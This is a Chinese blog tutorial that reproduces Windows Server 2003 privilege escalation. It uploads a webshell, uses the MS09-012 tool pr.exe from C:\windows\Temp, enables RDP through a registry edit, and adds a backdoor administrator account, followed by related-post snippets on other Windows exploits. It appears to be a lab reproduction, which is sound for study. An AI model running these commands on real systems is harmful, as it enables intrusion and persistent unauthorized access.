Windows2003系统漏洞提权复现

已于 2024-06-23 17:43:28 修改
阅读量1.6w 收藏 3
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全漏洞 web安全 安全 网络安全
于 2021-07-21 19:31:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118971557
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

操作系统: Microsoft Windows Server 2003

Web服务器: IIS V6.0

第一步,将大马文件上传至服务器根目录

第二步,访问大马文件,进入大马的控制界面

 

第三步,查看漏洞补丁信息

 

第四步,上传漏洞工具

将提权工具( 此处使用MS09-012漏洞工具 )上传到系统中,windows系统的回收站c:\windows\Temp目录默认具有上传和执行的权限

第五步,利用工具进行提权

payload

/c c:\windows\temp\pr.exe "whoami"

第六步,开启远程桌面端口

命令行查看是否开启3389( 远程桌面 )端口

/c c:\windows\temp\pr.exe "netstat -ano"

 

 

上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

 执行a.bat文件,开启3389端口

/c c:\windows\temp\pr.exe "c:\windows\temp\a.bat"

 查看3389是否开启成功

/c c:\windows\temp\pr.exe "netstat -ano"

 

第七步,添加管理员权限用户

添加普通用户tom

/c c:\windows\temp\pr.exe "net user tom 123456 /add"

 将tom添加至administrators,拥有管理员权限

/c c:\windows\temp\pr.exe "net localgroup administrators tom /add"

第八步,物理机连接远程桌面

 

 

士别三日wyx
关注
专栏目录
Windows 2003 Server远程代码执行漏洞集合
谢公子的博客
01-14 6211
目录 MS08-067 CVE-2017-7269 MS08-067 发布日期:2008/10/22 针对端口:139、445 漏洞等级:高危 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 漏洞原理:攻击者通过特制的RPC请求发给存在漏洞的主机,将可导...
Windows提权---系统漏洞提权
qq_40012781的博客
07-02 1343
思路:使用辅助工具检查出电脑上存在哪些漏洞,然后精准打击...
一份关于windows server服务器的安全漏洞处理建议(来自绿盟安全评估)_允许traceroute探测漏洞
2301_82056337的博客
05-08 1023
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。详细描述: SSL/TLS协议是一个被广泛使用的加密协议,Bar Mitzvah攻击实际上是利用了"不变性漏洞",这是RC4算法中的一个缺陷,它能够在某些情况下泄露SSL/TLS加密流量中的密文,从而将账户用户名密码,信用卡数据和其他敏感信息泄露给黑客。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
记一次某竞赛中的渗透测试(Windows Server 2003靶机漏洞
m0_73734159的博客
01-31 2016
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
Windows2003系统漏洞提权复现_windows server 2003web server漏洞
最新发布
2401_84301352的博客
06-25 185
提权工具( 此处使用MS09-012漏洞工具 )上传到系统中,windows系统的。上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口。命令行查看是否开启3389( 远程桌面 )端口。执行a.bat文件,开启3389端口。目录默认具有上传和执行的权限。查看3389是否开启成功。
windows server 2003 系统提权
08-09
windows server 2003 系统提权 课程名称:《系统提权》 【要求】 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试; 对MS03_026漏洞开启远程桌面服务; 操作过程可自由发挥; 概念越详细越好; 渗透和验证过程必要有截图和文字说明; 其余部分均可配文字简介叙述; 作业模板在此基础上可以自由发挥设计; 熟悉虚拟机的使用,了解渗透测试工具的使用方法和Linux、DOS命令
永恒之蓝——Windows server 2003 漏洞复现
Megumiwind的博客
07-28 1659
复现漏洞 靶机:Windows server 2003 IP:192.168.64.129 攻击机:kali 2021 1.在kali中启动msf模块 在控制台输入:msfconsole,或者在文件的漏洞利用工具集中双击metasploit framework进入msf。 进入后页面如下,图像为随机图像,如若与上图不符合实属正常现象。 2.搜索ms17_010:search ms17_010 3.使用命令:use auxiliary/scanner/smb/smb_ms1...
永恒之蓝——windows server 2003 漏洞
菜鸟-传奇
07-07 4203
永恒之蓝——windows server 2003 漏洞 作业参考 作业参考2 一、永恒之蓝简述: 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构...
windows server 2003 永恒之蓝(MS17-010)漏洞复现
weixin_53696027的博客
01-10 1345
windows server 2003复现永恒之蓝
利用windows系统漏洞提权
cxrpty的博客
03-10 1440
实验环境:windows2003windows2008 实验原理:通过systeminfo对比补丁编号,寻找exp,将exp上传到服务器进行攻击 网站中存在任意用户可读可写可执行的目录(Windows2003:RECYCLER 回收站,windows2008: C:\Windows\Temp\) 实验步骤...
CVE-­2021­-1732 Microsoft Windows10 本地提权漏洞复现
ST0new的博客
03-17 1576
CVE-­2021­-1732 Microsoft Windows10 本地提权漏洞复现 声明 本文仅供学习参考,请勿用作违法用途,否则后果自负 漏洞概要 漏洞名称: CVE-­2021­-1732 Microsoft Windows10 本地提权漏洞 漏洞类型: 本地权限提升 漏洞危害: 高 漏洞简介: Microsoft Microsof Windows Win32k是美国微软(Microsoft)公司的一个操作系统。提供一个多任务的图形用户界面。 受影响得版本及应用版本 Windows Server,
CVE-2020-0787 Windows全版本本地提权漏洞复现
m0_56642842的博客
07-23 3170
0x00 简介 2020年3月,微软公布了一个影响范围堪称windows全版本的本地提权漏洞CVE-2020-0787,根据微软的漏洞描述,攻击者在使用低权限用户登录系统后,可以利用该漏洞构造恶意程序直接提权到administrator或者system权限。 0x01 漏洞概述 当Windows背景智能传输服务(BITS)没有正确处理符号链接时,存在特权提升漏洞。成功利用此漏洞的攻击者可以改写目标文件,从而提升权限。要利用这个漏洞,攻击者首先必须登录系统,攻击者可以运行EXP,利用该漏洞提权进而完全控制受
Windows本地提权漏洞(CVE-2021-1732)复现
weixin_47531489的博客
07-20 2202
1 简介 2021年2月10日,微软每月的例行补丁包中修复了一个Windows系统本地提权漏洞,本地攻击者可以利用此漏洞提升到system权限,据称此漏洞被用于定向攻击活动。 2 漏洞概述 该漏洞由函数win32kfull!xxxCreateWi ndowEx 对应用层回调返回数据校验不严导致,本地用户执行漏洞利用程序获取系统权限。 漏洞等级:高危,漏洞评分:7.8。 3 影响范围 Windows Server, version 20H2 (Server Core Installation)
win2003 提权
weixin_45676689的博客
10-11 528
win2003 提权 win2003 提权 ##实验环境 Win2003+vmware15 Win2003作为目标机,在物理机浏览器访问192.168.41.131,看是否能访问到iss下的文件 ##访问已经上传好了的大马,并登录进去 ##在大马中使用cmd命令,查看whoami,显示为低权限 ##使用systeminfo查看补丁信息 ##为了提权,在大马中向目标机的回收站中上传提权.exe软件 ...
【内网提权windows2003本地PR提权详解
weixin_45588247的博客
08-17 2636
提权利用的漏洞 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程,本地攻击者可以利用令牌劫持的方式获得权限提升。成功利用此漏洞的攻击者可以完全控制受影响的系统,攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 BUGTRAQ ID: 34443 CVE(CAN) ID: CVE-2009-0079 发布日期:2009-04-14 更新日期.
2021-06-01web渗透学习之Windows2003提权
qq_45290991的博客
06-01 830
《系统提权》作业 课程名称:《系统提权》 【要求】 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试;对MS03_026漏洞开启远程桌面服务;操作过程可自由发挥;概念越详细越好;渗透和验证过程必要有截图和文字说明;其余部分均可配文字简介叙述;作业模板在此基础上可以自由发挥设计;熟悉虚拟机的使用,了解渗透测试工具的使用方法和Linu...
win2003服务器漏洞要修复吗,微软紧急发布Windows远程桌面高危漏洞补丁 涉及XP 2003...
weixin_27717759的博客
08-11 748
微软应急响应中心近日披露了WindowsServer2003,WindowsServer2008R2及WindowsServer2008的操作系统版本上存在的一个高危安全风险(漏洞编号:CVE-2019-0708),攻击者可利用该漏洞进行类似Wannacry的蠕虫利用攻击,影响大量WindowsXP、Windows2003Windows2008、Windows7的电脑及服务器。当未经身份验证的攻...
漏洞复现漏洞提权的区别
07-08
漏洞复现漏洞提权是两个相关但不同的概念。 漏洞复现指的是在实验环境中重新创建或模拟已知的漏洞,以验证漏洞的存在和复现攻击的效果。通过漏洞复现安全研究人员可以深入理解漏洞的原理和影响,并探索可能的利用方式。漏洞复现通常是在合法和受控的环境中进行,以确保安全性和不对现实环境造成实际危害。 而漏洞提权是指在攻击者成功利用已知的漏洞后,进一步获取更高权限或更深入系统的访问权限。通常情况下,攻击者通过漏洞提权来绕过系统的安全防御机制,例如从普通用户身份提升为管理员权限,或者从一个受限的应用程序访问其他系统资源。 总结来说,漏洞复现是验证漏洞的存在和攻击效果,而漏洞提权是利用漏洞后获取更高权限或更深入系统的访问权限。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值